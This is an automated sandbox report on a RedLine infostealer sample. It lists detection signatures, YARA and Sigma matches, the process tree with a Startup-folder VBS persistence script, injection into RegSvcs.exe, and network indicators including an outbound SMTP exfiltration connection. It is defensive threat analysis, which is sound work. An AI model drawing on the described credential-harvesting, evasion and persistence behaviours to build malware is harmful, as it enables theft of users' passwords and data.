Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
q6utlq83i0.exe

Overview

General Information

Sample name:q6utlq83i0.exe
renamed because original name is a hash value
Original sample name:a0ce83972e16b826fc209b7272260aa7ca67b58cec13fb62c5285bde3ab7a257.exe
Analysis ID:1528987
MD5:2b2832a4e1bf4e26e59980f4162334e2
SHA1:a9ae9ed9b7804a21fc0cf1e6b0d7d2e9f18b8336
SHA256:a0ce83972e16b826fc209b7272260aa7ca67b58cec13fb62c5285bde3ab7a257
Tags:exeRedLineStealeruser-adrian__luca
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • q6utlq83i0.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\q6utlq83i0.exe" MD5: 2B2832A4E1BF4E26E59980F4162334E2)
    • incalculability.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\q6utlq83i0.exe" MD5: 2B2832A4E1BF4E26E59980F4162334E2)
      • RegSvcs.exe (PID: 7376 cmdline: "C:\Users\user\Desktop\q6utlq83i0.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 7608 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • incalculability.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Local\inhumate\incalculability.exe" MD5: 2B2832A4E1BF4E26E59980F4162334E2)
      • RegSvcs.exe (PID: 7760 cmdline: "C:\Users\user\AppData\Local\inhumate\incalculability.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • incalculability.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Local\inhumate\incalculability.exe" MD5: 2B2832A4E1BF4E26E59980F4162334E2)
        • RegSvcs.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\inhumate\incalculability.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1899832832.0000000003B40000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 3C 88 44 24 2B 88 44 24 2F B0 C3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.

Unpacked PEs

SourceRuleDescriptionAuthorStrings
5.2.incalculability.exe.3b40000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 3C 88 44 24 2B 88 44 24 2F B0 C3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , ProcessId: 7608, ProcessName: wscript.exe
Sigma detected: Suspicious Outbound SMTP Connections
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 198.54.122.135, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7376, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , ProcessId: 7608, ProcessName: wscript.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\inhumate\incalculability.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: q6utlq83i0.exeAvira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeAvira: detection malicious, Label: HEUR/AGEN.1321671
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeReversingLabs: Detection: 63%
Multi AV Scanner detection for submitted file
Source: q6utlq83i0.exeReversingLabs: Detection: 63%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: q6utlq83i0.exeJoe Sandbox ML: detected
Source: q6utlq83i0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: incalculability.exe, 00000001.00000003.1749762795.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000001.00000003.1747982807.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897663711.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897923919.0000000004580000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: incalculability.exe, 00000001.00000003.1749762795.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000001.00000003.1747982807.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897663711.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897923919.0000000004580000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 198.54.122.135:587
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 198.54.122.135 198.54.122.135
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 198.54.122.135:587
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004422FE InternetQueryDataAvailable,InternetReadFile,5_2_004422FE
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: mail.privateemail.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0045A10F
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0045A10F
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,5_2_0046DC80
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,5_2_0044C37A
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0047C81C

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.incalculability.exe.3b40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000005.00000002.1899832832.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_00431BE8
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_00446313
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004333BE
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004096A05_2_004096A0
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0042200C5_2_0042200C
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0041A2175_2_0041A217
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004122165_2_00412216
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0042435D5_2_0042435D
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004033C05_2_004033C0
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044F4305_2_0044F430
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004125E85_2_004125E8
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044663B5_2_0044663B
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004138015_2_00413801
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0042096F5_2_0042096F
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004129D05_2_004129D0
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004119E35_2_004119E3
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0041C9AE5_2_0041C9AE
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0047EA6F5_2_0047EA6F
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0040FA105_2_0040FA10
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044EB595_2_0044EB59
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00423C815_2_00423C81
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00411E785_2_00411E78
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00442E0C5_2_00442E0C
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00420EC05_2_00420EC0
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044CF175_2_0044CF17
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00444FD25_2_00444FD2
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_03F28EE05_2_03F28EE0
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: String function: 004115D7 appears 36 times
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: String function: 00416C70 appears 39 times
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: String function: 00445AE0 appears 65 times
Source: q6utlq83i0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 5.2.incalculability.exe.3b40000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000002.1899832832.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: classification engineClassification label: mal100.spyw.expl.evad.winEXE@14/3@2/2
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044AF6C GetLastError,FormatMessageW,5_2_0044AF6C
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004333BE
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,5_2_00464EAE
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,5_2_0045D619
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,5_2_004755C4
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,5_2_0047839D
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,5_2_0043305F
Source: C:\Users\user\Desktop\q6utlq83i0.exeFile created: C:\Users\user\AppData\Local\inhumateJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
Source: C:\Users\user\Desktop\q6utlq83i0.exeFile created: C:\Users\user\AppData\Local\Temp\endochylousJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs"
Source: q6utlq83i0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\q6utlq83i0.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: q6utlq83i0.exeReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\q6utlq83i0.exeFile read: C:\Users\user\Desktop\q6utlq83i0.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\q6utlq83i0.exe "C:\Users\user\Desktop\q6utlq83i0.exe"
Source: C:\Users\user\Desktop\q6utlq83i0.exeProcess created: C:\Users\user\AppData\Local\inhumate\incalculability.exe "C:\Users\user\Desktop\q6utlq83i0.exe"
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\q6utlq83i0.exe"
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\inhumate\incalculability.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Users\user\AppData\Local\inhumate\incalculability.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"
Source: C:\Users\user\Desktop\q6utlq83i0.exeProcess created: C:\Users\user\AppData\Local\inhumate\incalculability.exe "C:\Users\user\Desktop\q6utlq83i0.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\q6utlq83i0.exe"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\inhumate\incalculability.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Users\user\AppData\Local\inhumate\incalculability.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"Jump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: wininet.dllJump to behavior
